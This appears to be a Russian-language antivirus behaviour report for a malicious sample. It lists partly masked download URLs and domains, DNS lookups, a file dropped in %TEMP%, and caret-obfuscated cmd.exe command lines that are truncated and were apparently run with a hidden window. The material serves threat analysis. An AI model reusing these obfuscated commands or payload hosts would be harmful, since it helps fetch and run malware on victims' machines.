Техническая информация
- '<SYSTEM32>\cmd.exe' /c fo^r ; /f , ; " tokens= 2 delims=fC=GF" , %^8 , ; in , ( ; ' , aSSO^^c , ; ^^.cm^^d ' , ) , ; ^D^O , , %^8; , MX1v^/^vil^ ; ; yYKcnjhd/r " , ( (^SEt ^ ^}^-^;@=L^vGAizF41D6$C...
- %TEMP%\319.exe
- %TEMP%\319.exe
- '42##ays.com':80
- 'ai###-evy.cn':80
- 'ap###iajar.com':80
- http://42##ays.com/zzxcQbq/
- http://www.42##ays.com/zzxcQbq/
- http://ai###-evy.cn/n0Gjjic9U/
- http://ap###iajar.com/X9OLL3kcv/
- DNS ASK 42##ays.com
- DNS ASK ai###-evy.cn
- DNS ASK ap###iajar.com
- DNS ASK cr####ostello.com
- DNS ASK am#####santorfeto.com
- '<SYSTEM32>\cmd.exe' /c fo^r ; /f , ; " tokens= 2 delims=fC=GF" , %^8 , ; in , ( ; ' , aSSO^^c , ; ^^.cm^^d ' , ) , ; ^D^O , , %^8; , MX1v^/^vil^ ; ; yYKcnjhd/r " , ( (^SEt ^ ^}^-^;@=L^vGAizF41D6$C...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c aSSO^c ^.cm^d
- '<SYSTEM32>\cmd.exe' ; , MX1v/vil ; ; yYKcnjhd/r " , ( (^SEt ^ ^}^-^;@=L^vGAizF41D6$C^s^m,3/^)a2 ^pW^wef^Xldq=n;tN\^gP^:.{bR^QkB^j-hr'9o^@^(EH0U^xOy^+^S}KcM) , )& , ; fo^r ; %D ; ^IN ; ( ^2^2 53 ^2...